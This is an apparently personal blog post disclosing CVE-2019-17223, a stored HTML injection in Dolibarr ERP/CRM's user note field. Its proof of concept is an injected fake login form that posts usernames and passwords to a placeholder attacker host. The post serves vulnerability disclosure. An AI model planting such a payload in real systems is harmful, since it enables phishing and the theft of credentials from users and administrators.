CVE-2019–17223 — Stored HTML Injection | Dolibarr CRM/ERP

João Zietolie Ciconet
Oct 6 · 2 min read

Summary

Dolibarr ERP/CRM is a open source software for small and medium businesses, foundations or freelancers, it provides different features for enterprise resource planning and customer relationship management.

The latest version of Dolibarr provide a good mechanism of defense for script injections, but with some research in the platform I found a field that do not validate the input at all, leaving room for HTML code execution.

Description

In user dashboard, has a field to save notes, the input is not validate at all, and I was able to inject HTML code, that is stored in the application. The main problem is that all the page can be customized by injections on note.php and simply accessed by the link:
http://(IPOfApplication)/dolibarr/user/note.php?id=(user_id)

In my PoC(Proof of Concept) I craft a simple WEB login page, this page is showed by accessing the link above by the user or by principally, and more critical, the admin of the application. A complete and similar login page of the real application could be done and stored, making a good and convincing phishing since the URL is trusted and part of the application. Also this can be used for other type of attacks like session hijacking or just “defacement” of this page.

Below the vulnerable field(note.php):

There, I injected my simple login page, attackers could inject their own malicious HTML code like this:

<div style=’position: absolute; left: 0px; top: 0px; width: 2000px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;’>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name=’Login’ action=’http://attackerIP:port/'><table><tr><td>Username:</td><td><input type=’text’ name=’username’/></td></tr><tr><td>Password:</td><td><input type=’text’ name=’password’/></td></tr><tr><td colspan=2 align=center><input type=’submit’ value=’Login’/></td></tr></table></form></div>

Once injected, always that user visit their notes by the dashboard or by the link, the login page will be showed and the attacker can visualize the credentials on his own server:

This vulnerability affects the version 10.0.2 but other versions may also vulnerable.

For more:

https://snyk.io/vuln/SNYK-PHP-DOLIBARRDOLIBARR-473217

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17223
https://nvd.nist.gov/vuln/detail/CVE-2019-17223

https://www.cvedetails.com/cve/CVE-2019-17223/

João Zietolie Ciconet

Written by

CTF Player and Security Analyst at XLabs Security

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade